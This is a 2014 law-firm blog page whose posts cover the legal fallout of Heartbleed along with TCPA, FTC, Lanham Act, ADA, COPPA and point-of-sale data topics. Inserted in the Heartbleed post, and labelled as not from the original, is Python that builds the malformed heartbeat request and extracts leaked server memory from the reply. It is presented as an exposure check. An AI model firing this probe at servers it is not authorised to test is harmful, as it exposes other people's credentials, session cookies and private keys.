
FAQs Concerning the Legal Implications of the Heartbleed Vulnerability

Posted in Breach Notice, Breach Notification, California, Information Security

(Contributors to this post include:  Scott Koller, David Navetta, Mark Paulding and Boris Segalis)

By now, most of the world is aware of the massive security vulnerability known as Heartbleed (it even comes with a slick logo and its own website created by the organization that discovered the vulnerability).  The bug is a missing bounds check in OpenSSL’s implementation of the TLS heartbeat extension: an unauthenticated remote party can ask a server to echo a short “heartbeat” payload while declaring a payload length far larger than what was actually sent, and the server answers with up to 64 KB of whatever happened to be in its process memory at the time, leaving no trace in ordinary access logs.  According to reports, this vulnerability has been present for two years in the OpenSSL releases that approximately two-thirds of the servers on the Internet rely on (versions 1.0.1 through 1.0.1f and 1.0.2-beta1; version 1.0.1g contains the fix, and most Linux distributions have backported it into their 1.0.1 packages without changing the reported version number, so the version string alone does not tell you whether a server is patched).  Mashable is keeping a list of some prominent affected sites, including a status on their remediation efforts.  As discussed further below, this vulnerability, if exploited, could lead to the compromise of authentication credentials (e.g. usernames, passwords, session cookies and the server’s TLS private key), and in some cases the unauthorized access or acquisition of information contained in communications sent over the Internet from, or stored on, compromised sites.  Because a stolen private key also allows previously recorded TLS sessions to be decrypted where the negotiated cipher suite did not provide forward secrecy, remediation means revoking and reissuing certificates after patching, not patching alone.  In short, the security of millions of organizations is likely affected by Heartbleed in three ways:

  • Communications to the Organization’s Servers.  An organization that runs an affected version of OpenSSL on an Internet-facing system may have had that system’s memory read by anyone who connected to it, including the server’s private key, session cookies and data being processed at the time; communications to and from that system may therefore have been decrypted or intercepted.
  • Communications by an Organization’s Employees to Third Party Organizations Affected by Heartbleed.  The authentication credentials of personnel and information sent by an organization’s employees to business-related websites subject to Heartbleed (e.g. Dropbox) may be at risk.  If an employee logged into such a site, his or her password could have been compromised, and hackers could also have obtained access to information sent by the employee over encrypted SSL channels and to information held on the business site itself.
  • Communications by Employees to Organizations Affected by Heartbleed During their Personal Use of the Internet.  An employee visiting a website affected by Heartbleed (e.g. Google and thousands of other common consumer sites) during personal Internet use (at home, in the office or offsite) could have had his or her username and password compromised.  If that employee uses the same username and password to log into the employer’s systems, those systems could also be at risk.

In addition to the serious security concerns implicated by Heartbleed, there may be legal consequences associated with this vulnerability, especially with respect to the potential unauthorized access or acquisition of personal information.  At this juncture it is imperative that affected organizations remediate the Heartbleed vulnerability, communicate with their customers, employees and other system users, and consider potential legal risks and obligations associated with Heartbleed.

In this blogpost we present some key FAQs concerning the security and resulting legal implications of Heartbleed.  Specifically, we address remediation efforts necessary to reduce security and legal risk associated with Heartbleed, password reset and communications to affected individuals, the applicability of breach notification laws, and potential investigation obligations under HIPAA’s Security Rule.
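As an added illustration (not code from the original post or from the OpenSSL project), the following Python shows the two checks a practitioner runs when deciding whether a server falls within the affected population described above: a classifier for upstream OpenSSL version strings against the affected range, and the construction of the malformed heartbeat request that triggers the bug together with a classifier for the server’s reply. The sample replies are constructed inline so the block runs offline; against a live server the probe would be sent on the socket after the handshake reaches ServerHelloDone, which this block does not do. All function names and the sample data are this example’s own.

```python
"""Heartbleed exposure checks (added example; not code from the original post).

check 1: is_vulnerable_version() classifies an upstream OpenSSL version string
         against the affected range: 1.0.1 through 1.0.1f, plus 1.0.2-beta1.
         Caveat: distributions backport the fix without bumping the upstream
         version, so a version match is a lead, not a finding.
check 2: build_heartbeat_probe() builds the TLS heartbeat record that triggers
         the bug (declared payload length larger than the payload sent), and
         classify_heartbeat_response() / leaked_bytes() interpret the reply.
         Sample replies below are constructed, so the block runs offline.
"""
import re
import struct

HEARTBEAT_CT = 24          # TLS ContentType heartbeat (RFC 6520)
ALERT_CT = 21              # TLS ContentType alert
HB_REQUEST, HB_RESPONSE = 1, 2
TLS1_1 = (3, 2)            # record-layer version bytes; must match the negotiated version

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]*)(?:-beta(\d+))?")


def is_vulnerable_version(version: str) -> bool:
    """True if an upstream OpenSSL version string is in the Heartbleed range.
    Accepts `openssl version` output ("OpenSSL 1.0.1e 11 Feb 2013") or a bare "1.0.1e"."""
    m = _VERSION_RE.search(version.replace("OpenSSL", "").strip())
    if not m:
        raise ValueError(f"unrecognised OpenSSL version string: {version!r}")
    major, minor, fix, letter, beta = m.groups()
    triple = (int(major), int(minor), int(fix))
    if triple == (1, 0, 1):
        return letter <= "f"          # 1.0.1 (no letter) .. 1.0.1f affected; 1.0.1g is the fix
    if triple == (1, 0, 2):
        return beta == "1"            # only 1.0.2-beta1 shipped the bug
    return False                      # 0.9.8 / 1.0.0 never had the heartbeat code


def build_heartbeat_probe(claimed_len: int = 0x4000, tls_version=TLS1_1) -> bytes:
    """Heartbeat request carrying no payload but declaring claimed_len bytes.
    An unpatched server trusts the declared length and echoes claimed_len bytes
    of its own heap (whatever follows the 3-byte request in memory)."""
    body = struct.pack("!BH", HB_REQUEST, claimed_len)
    return struct.pack("!BBBH", HEARTBEAT_CT, *tls_version, len(body)) + body


def _split_record(record: bytes):
    """Return (content_type, body) for one TLS record, or (None, b'') if truncated."""
    if len(record) < 5:
        return None, b""
    ct, _vmaj, _vmin, length = struct.unpack("!BBBH", record[:5])
    return ct, record[5:5 + length]


def classify_heartbeat_response(record: bytes) -> str:
    """'vulnerable'  - heartbeat response carries bytes we never sent (leaked memory)
       'no_leak'     - alert, or a heartbeat response with no extra bytes
       'no_response' - nothing usable (a patched server silently drops the probe,
                       which shows up as a read timeout on a live socket)"""
    ct, body = _split_record(record)
    if ct == ALERT_CT:
        return "no_leak"
    if ct != HEARTBEAT_CT or len(body) < 3 or body[0] != HB_RESPONSE:
        return "no_response"
    return "vulnerable" if len(body) > 3 else "no_leak"


def leaked_bytes(record: bytes) -> bytes:
    """Everything after the 3-byte heartbeat header: the server's memory (plus 16
    padding bytes at the end of the final fragment). Concatenate across records
    if the server fragmented a large response."""
    ct, body = _split_record(record)
    if ct != HEARTBEAT_CT or len(body) < 3 or body[0] != HB_RESPONSE:
        return b""
    return body[3:]


# ---- constructed sample replies (not captured from any real server) ----
_FAKE_HEAP = b"user=alice&password=hunter2&" + b"\x00" * 996         # 1024 bytes
SAMPLE_LEAKY_RESPONSE = (struct.pack("!BBBH", HEARTBEAT_CT, *TLS1_1, 3 + len(_FAKE_HEAP))
                         + struct.pack("!BH", HB_RESPONSE, 0x4000) + _FAKE_HEAP)
SAMPLE_ALERT = struct.pack("!BBBH", ALERT_CT, *TLS1_1, 2) + bytes([2, 10])  # fatal unexpected_message

if __name__ == "__main__":
    for v in ("OpenSSL 1.0.1e 11 Feb 2013", "1.0.1g", "1.0.2-beta1"):
        print(f"{v:30} vulnerable-by-version={is_vulnerable_version(v)}")
    print("probe:", build_heartbeat_probe().hex())
    print("sample reply:", classify_heartbeat_response(SAMPLE_LEAKY_RESPONSE),
          "leaked", len(leaked_bytes(SAMPLE_LEAKY_RESPONSE)), "bytes")
```

The version check is deliberately only a first pass: a Debian or Red Hat package can report 1.0.1e and still be patched, so the live probe (or the vendor’s package changelog) is what settles the question. Anything `leaked_bytes()` returns beyond the padding is evidence of the exposure the post describes, and the same logic, run against a packet capture of past connections, is how an investigator would look for prior exploitation.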


Two FCC TCPA Orders Address Consent through an Intermediary, Provide First TCPA Exemption, and Hint at Future Directions

Posted in TCPA

The FCC recently issued a Declaratory Ruling and an Order that provide some clarity in the TCPA arena and create a new exemption for certain types of text messages and calls. In sum, the FCC clarified that a company may obtain “prior express consent” through an intermediary for the purpose of sending administrative text messages. In addition, the FCC created an exemption for package delivery companies to send delivery notification text messages and make autodialed calls to mobile numbers in the absence of prior express consent. Even for companies not directly affected by these changes, the ruling and a concurring statement by a new FCC commissioner may provide some guidance for marketing messages and foreshadow the direction of future FCC action. Read our full analysis below.


#Sweepstakes and #Contest #Entries on Pinterest Are Endorsements, says FTC; Implications Beyond Pinterest

Shannon Harell Posted in FTC

The Federal Trade Commission (“FTC”) recently investigated Cole Haan, Inc. to determine whether a contest that it conducted on Pinterest violated Section 5 of the FTC Act, which, in part, requires the disclosure of a material connection between a marketer and an endorser when their relationship is not otherwise apparent from the context of the endorsement. The FTC’s Guides Concerning the Use of Endorsements and Testimonials in Advertising and the FTC’s updated .com Disclosure Guides explain the “material connection” principle in more detail, but neither guidance document mentions sweepstakes or contest entries as the type of incentive that creates a material connection between the sponsor and entrants.

Cole Haan’s contest asked each entrant to create a “Wandering Sole” board, to pin 5 shoe images from Cole Haan’s own “Wandering Sole” board, and to pin 5 images of the entrant’s “favorite places to wander”—all for the chance to win a $1000 shopping spree.[i] Each pin was to include the hashtag #wanderingsole. In a letter closing its investigation, the FTC found that:

  1. The pins featuring Cole Haan products were endorsements;
  2. Consumers who saw the pins and boards would not reasonably be aware that the pinners were incentivized by the chance to win the contest;
  3. The pins and boards were not adequately labeled to show the material connection between Cole Haan and the entrants (i.e., that the pinners were incentivized with an entry in a contest); and
  4. Cole Haan had failed to instruct entrants to disclose such material connection.

The FTC did not pursue further enforcement against Cole Haan in part because this is the first time the FTC has publicly addressed whether entry into a contest is a form of material connection and whether a pin on Pinterest may constitute an endorsement.  In addition, Cole Haan subsequently adopted a social media policy to address the FTC’s concerns with respect to disclosure of material connections by Cole Haan endorsers.

We note that the position taken by the FTC that pins can be endorsements is not inconsistent with the position taken by the National Advertising Division of the Better Business Bureau (“NAD”) nearly two years ago in its report on Nutrisystem Inc.’s “Real Consumers. Real Success.” board on Pinterest.  The NAD found that consumer pins such as “Christine B. lost 46lbs on Nutrisystem” were testimonials.

Key Takeaways: The Cole Haan FTC letter reinforces our recommendation that advertisers must tread carefully when conducting promotions on Pinterest and all other social media outlets (including, without limitation, Twitter, Vine, Tumblr and Instagram).  Yes, the principles discussed in the Cole Haan FTC letter apply across social media outlets; not just on Pinterest. Specifically, when advertisers ask consumers to post on social media as a means of obtaining an entry in a promotion where the entry promotes the brand or includes branded material (whether the brand is promoted in the text, a hashtag, a photo or a video), the entry post must include some clear and conspicuous indicator that the consumer has received an entry in a promotion (e.g., sponsors can require the unique hashtag for the entry post to include the word “entry”, “contest”, or “sweepstakes”).


[i] We note that the Cole Haan contest, as described in the FTC’s letter, seemingly violates the Pinterest policy that prohibits asking consumers to pin from a selection (see Pinterest Brand Guidelines). As we have explained in a recent post, advertisers must also always remember to review the applicable platform’s guidelines before running a promotion on that social media platform.


A Brief Analysis of the Textile Labeling Rules 2014 Amendments

Posted in FTC, International, Textiles

By Jamie Rubin & Andrew L. Hoffman

The FTC amended the Textile Labeling Rules on March 14, 2014.[1] These amendments do not impose new obligations on textile manufacturers or retailers, and at least one of the changes will likely benefit manufacturers. Namely, a hang-tag is no longer required to include a full fiber content disclosure, thereby enabling the creation of a single hang-tag for a variety of garments that share the advertised fiber, but which otherwise have different fiber compositions. This change will also enable manufacturers to create hang-tags before the final garment fiber content is known. In addition, the FTC declined to implement its proposed changes to the continuing guarantee requirement in the face of industry objections. See below for a summary of the other changes and our analysis.


The U.S. Supreme Court Provides a National Standard for Who Can Sue for False Advertising Under the Lanham Act

Posted in Advertising Law, False Advertising, Lawsuit

Just last week, the United States Supreme Court provided much-needed clarification on the issue of who has standing to bring a false advertising claim under the Lanham Act, 15 U.S.C. § 1125(a).  The decision, Lexmark Int’l v. Static Control Components, US Supreme Court slip opinion (March 25, 2014), provides a national standard that remedies a three-way split among the circuit courts.

The plaintiff in the case, Lexmark, manufactures laser printers and toner cartridges. Remanufacturers buy used cartridges from Lexmark customers, refill them and sell them back to owners of Lexmark printers. The defendant, Static Control, makes microchips and other parts used by these cartridge remanufacturers. A microchip Lexmark manufactured disabled certain discounted printer cartridges once they had been used, rendering them useless to remanufacturers. Static Control manufactures its own microchip that allows Lexmark printer cartridges to be used with Lexmark printers, even in the presence of Lexmark’s disabling microchip.


Pitfalls and Complications in Running a New-Media Promotion

Posted in Marketing, Social Networking, Sweepstakes

Administering a sweepstakes or contest online can be a great way to attract traffic and engage with consumers. Not surprisingly, many companies routinely utilize sweepstakes and contests (which are referenced collectively in this article as “promotions”) as part of their overall online marketing push. Administering promotions, however, can get complicated when operating them on third-party platforms, such as social media sites. Many of you are no doubt familiar with the basic laws applicable to running an online promotion. This article does not discuss those laws, but rather describes some of the more detailed or latent issues and complications that need to be considered and addressed when running a promotion on certain social-media platforms.

(1) Know Your Limitations When Operating on Social Media, Part I – Contractual Restrictions

Each of the major social-media platforms comes with its own distinct considerations when using the platform to run a promotion. These services often use their respective terms of service and related agreements to restrict whether and how a business can use the service to administer a promotion.


Attorney General Harris Unveils Cybersecurity Guide for California Businesses

Scott Koller Posted in Information Security

The California Attorney General’s Office has announced the release of a new cybersecurity guide designed to help California businesses better protect against and respond to cybersecurity threats.  The guide provides a simple and easy to understand overview of basic security threats and outlines some practical steps for minimizing cyber vulnerabilities, including guidance on how to respond to cyber incidents.

“California is at the center of the digital revolution that is changing the world. Because of work done by companies right here in our home state, we are more connected – and empowered – than ever before” said Attorney General Kamala D. Harris.  “But we are also increasingly vulnerable, a fact underscored by the recent holiday–period data breaches that impacted millions across the country.”

California has long been at the forefront of cyber security advocacy and was the first state to pass a law mandating data breach notification.  In 2011, California established the eCrime Unit to prosecute identity theft, data intrusions, and crimes involving the use of technology.  In 2012, California established the Privacy Enforcement and Protection Unit in the Department of Justice, whose mission is to help regulate and enforce laws addressing the collection, retention, disclosure, and destruction of private or sensitive information.  Continuing that tradition, Attorney General Harris, in collaboration with the California Chamber of Commerce and a mobile security company called Lookout, developed the guide titled “Cybersecurity in the Golden State” (the “Guide”).

The purpose of the Guide is to specify ways that small and medium-size businesses can reduce cybersecurity risks.  To accommodate individuals who may not be tech-savvy, the Guide uses plain language to describe steps that any business can take to help protect itself, even if it lacks the resources to hire full-time cybersecurity personnel.

Key recommendations include:

  • Assume you’re a target and develop an incident response plan now;
  • Map your data and review where your business stores or shares information with third parties including backup storage and cloud computing;
  • Encrypt the data you need to keep. Strong encryption technology is now commonly available for free, and is generally easy to use;
  • Educate employees about cyber threats, as they are often the first line of defense;
  • Follow safe online practices such as regularly updating firewall and antivirus software on all devices, using strong passwords, and avoiding downloading software from unknown sources;

The issue of cyber security is increasingly important, as the recent security breaches at Target and Neiman Marcus help to demonstrate.  According to data cited by the Attorney General’s Office, there were more than one billion cyberattacks in the first three months of 2013, a number that is likely to keep growing as hackers become more sophisticated and organized.  While the recommendations contained in the Guide are not legally mandated, they do reflect security best practices that, if followed, have the potential to help mitigate the risk of cybersecurity attacks.

To obtain a copy of the “Cybersecurity in the Golden State” guide, click here.

DOJ Consent Decree Provides Guidance on Web Accessibility Compliance Under ADA

Posted in Lawsuit

On March 6, 2014, the Department of Justice (“DOJ”) issued a press release announcing a proposed consent decree against H&R Block to resolve claims that the H&R Block website, mobile applications, and online tax preparation products were not appropriately accessible to the disabled.  DOJ alleged that failing to make these online services accessible to the disabled violated Title III of the Americans with Disabilities Act (“ADA”), 42 U.S.C. §§ 12181 – 12189, and its implementing regulations, 28 C.F.R. Part 36.

This consent decree is noteworthy since DOJ has not yet published guidance on web accessibility.  Therefore, the consent decree may provide insight into the content of the forthcoming guidance.  Among the key questions about the upcoming guidance is how it may differ from the W3C Web Content Accessibility Guidelines 2.0 (“WCAG 2.0”).  The consent decree requires H&R Block to adopt accessibility measures conforming to WCAG 2.0.  Therefore, it appears that WCAG 2.0 remains the best framework to rely upon in the absence of substantive federal guidance.

There are several additional points of note in the consent decree.



Posted in Advertising Law, Apps, Children's Privacy, Marketing, Mobile, Privacy Law, Social Networking, Wireless

The Children’s Advertising Review Unit of the Council of Better Business Bureaus (CARU) routinely monitors advertising to children.  Through those monitoring efforts, CARU brings challenges against advertisers for alleged non-compliance with its Self-Regulatory Program for Children’s Advertising and the Children’s Online Privacy Protection Act (COPPA).  In a recent case published on March 10, 2014, CARU pursued children’s mobile app maker Outfit 7.  Outfit 7 develops, markets and distributes mobile apps such as MY TALKING TOM, TALKING TOM CAT 2 and JIGTY on Apple’s App Store, Google Play and the Windows Phone Store.  The subject of CARU’s challenge against Outfit 7 was the TALKING TOM CAT 2 app.  In addition to other features, the TALKING TOM CAT 2 app allows users to speak words into the device’s microphone, and Tom, the talking cat, repeats them back in a funny voice.  The app displays banner ads at the top of the screen that advertise other game apps, many of which are developed by Outfit 7.  The app is also occasionally completely taken over by large pop-up ads provided by third party advertising networks.  CARU claimed that none of the ads were labeled or identified as ads.  In addition, CARU took issue with the fact that the app included a “child mode” setting that a user of any age could control by merely clicking to turn it off within the app.  At the time of the challenge, the app contained no age-screening feature.  If a user turned “child mode” off, in-app purchases were enabled and the user could link to Twitter, which, as CARU points out, is a web site that does not age screen.  CARU was concerned that children may not understand that the ads are actually ads (and not game content) and that the app links to Twitter, which is a website inappropriate for children.

Outfit 7 disagreed with CARU’s concerns about the presentation of the ads and claimed that all were presented “in accordance with accepted industry standards” and “in a way that makes it clear that they are ads.”  Nonetheless, Outfit 7 agreed to label the banner ads that advertised its own apps as ads.  As to the ads served by third party advertising networks, Outfit 7 told CARU that the agreements it has in place with ad networks do not allow it to change the ads, but that its agreements do require the ad network to abide by Outfit 7’s advertising restrictions, one of which is that ads must be clearly identifiable as ads and not disguised as editorial content.  Outfit 7 also disagreed with CARU’s concerns about the link to Twitter because the app only links to the Twitter profile for the Tom Cat character, and for any other activity on Twitter a user must register and be 13 years old (although Twitter does not screen for age at registration).  CARU requested demographic data from Outfit 7, presumably to help determine the age range of users of the app.  Outfit 7 had no such data, but indicated it had already determined that it would conduct a survey to determine its user demographics and make COPPA compliance decisions based on those results.

As to the issue of data collection within the app, Outfit 7 told CARU that it collects “some non-intrusive data such as usage data and data about the device” and IP address to determine the country of the user for app localization.  The “child mode” operates to help prevent against inadvertent clicking of buttons, disables in-app purchases and the sharing of information outside of the app.


CARU determined that a child may not understand that the banner ads at the top of the screen are advertisements.  On this issue, one of CARU’s guidelines specifically reads: “If an advertiser integrates an advertisement into the content of a game or activity, then the advertiser should make clear in a manner that will be easily understood by the intended audience, that it is an advertisement.”  CARU found that the banner ads at the top of the screen could appear to a child as just another icon on the screen.   CARU went on to write “A child, particularly one who may not be able to read, might tap on the advertisement expecting it to cause Talking Tom to complete another action.”  CARU was not persuaded by Outfit 7’s claim that its ads were presented in accordance with industry standards and went even further to clarify that CARU is not bound by industry standards.  CARU did not require further action in connection with the takeover pop-up ads that were served by third party ad networks.


Despite the unavailability of actual data to tell CARU the demographics for the app, CARU determined that the cartoon-like characters and activities available within the app allow it to infer that a significant number of children are using the app.  Because “child mode” in the app disables sharing of information outside of the app, disables the ability to sign up for a newsletter and a link to Facebook and Twitter, CARU found that the app should implement a neutral age-screening process before the “child mode” can be turned off.  In addition, CARU recommended that Outfit 7 remove the link to Twitter altogether.

Why This Matters

There are three main takeaways here:

(1) CARU discovered Outfit 7’s app through its own routine monitoring of the industry; not from a competitor or complaining user;

(2) The ad blurring discussion in this case presents a good reminder that CARU (and regulators in general) will review ads by taking into account the totality of available factors, including the ad itself, the surrounding content and features and the likely audience; and

(3) app developers are trying all sorts of ways to comply with COPPA or to figure out ways to make COPPA irrelevant for their apps.  COPPA compliance has never been easy, but the recent amendments to the COPPA Rule require significant attention to detail, particularly when planning to launch an app.  See our post HERE on the recent amendments to the COPPA Rule.  CARU’s inquiry in this case involved taking a look at where Outfit 7 advertised its app, the content and features of the app, the information collected by the app (both actively and passively, in the background), any demographics known about the app, the third parties involved in the app (e.g., network advertisers) and how users can travel from the app to third party sites and platforms.  That level of inquiry is a good start for app developers to undertake internally when beginning the process of determining what level of COPPA compliance may be necessary for an app.

Point of Sale Data Collection Litigation – An Overview and Future Directions

Posted in California, Data Privacy Law or Regulation, Lawsuit, PII, Plastic Card Protection Laws, Privacy and Security Litigation, Privacy Law

California and 14 other states plus the District of Columbia have laws that restrict the collection of personal information at the point of sale when payment is by credit card. Unfortunately for retailers, the scope of prohibited conduct under these laws is not always clear. Complicating matters further, these laws were generally enacted in the early 1990s, but are now being applied to retail practices that could not have been contemplated at the time the statutes were enacted. For instance, plaintiffs have sued under these laws to address modern retail practices, such as rewards or customer loyalty programs, e-receipts, unmanned kiosks, and the collection of ZIP codes for CRM purposes. Plaintiffs have also argued – unsuccessfully so far in California under the Song-Beverly Credit Card Act – that these laws apply online. Litigation under these laws is increasing, following consumer-friendly decisions from the California and Massachusetts high courts. This article provides an overview of the current state of the law on point of sale data collection laws, including recent and pending litigation, and makes predictions regarding where the law is heading.
